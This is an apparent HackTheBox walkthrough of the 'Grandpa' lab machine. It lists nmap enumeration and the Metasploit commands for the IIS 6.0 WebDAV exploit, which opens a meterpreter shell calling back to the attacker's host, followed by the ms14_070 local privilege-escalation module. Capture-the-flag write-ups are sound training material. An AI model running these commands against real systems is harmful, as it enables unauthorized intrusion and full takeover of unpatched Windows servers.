Grandpa — HackTheBox

Sidharth R
Feb 20, 2021

Hello guys, this is a walkthrough for ‘Grandpa’ from ‘hackthebox’.

Whenever I get a machine, I always start with enumerating the target machine using the following ‘nmap’ command:

nmap -sV -O -F --version-light 10.10.10.14

Now we know that Microsoft IIS httpd 6.0 is running on port 80. On visiting the website

Hmm…The website looks like it is under construction. I tried using wfuzz, but nothing worked. So, I googled about ‘Microsoft IIS httpd 6.0 exploits’ and got this.

Then, I opened msfconsole and used the following commands:

use exploit/windows/iis/iis_webdav_scstoragepathfromurl

set RHOSTS 10.10.10.14

set LHOST <Your IP>

run

The module worked and I got a meterpreter shell. However, I couldn’t get anything out of it because the current user didn’t have enough privileges. I tried to escalate, but nothing gave me the permissions.

After a while, I tried to figure out a program that was running as both the superuser and the current user for escalating the privilege. But, luck didn’t favour. On listing all the processes using ‘ps’, I found that some processes were owned by ‘NT AUTHORITY\NETWORK SERVICE’ user and I was running under ‘rundll32.exe’ which had no user ownership. Therefore, I migrated to ‘davcdata.exe’.

After finishing the migration, I thought I’d use ‘post/multi/recon/local_exploit_suggester’ to find more exploits for the current session.

I ran the module on session 1 and got 6 exploits. Then, I started trying the third exploit ‘exploit/windows/local/ms14_070_tcpip_ioctl’ and it helped me to elevate the privileges. I used the following commands:

use exploit/windows/local/ms14_070_tcpip_ioctl

show options

set session <your session number>

set lhost <your ip>

set lport <your port>

run

I got the user flag from C:\Documents and Settings\Harry\Desktop\user.txt and the root flag from C:\Documents and Settings\Administrator\Desktop\root.txt.

Thanks for the read.
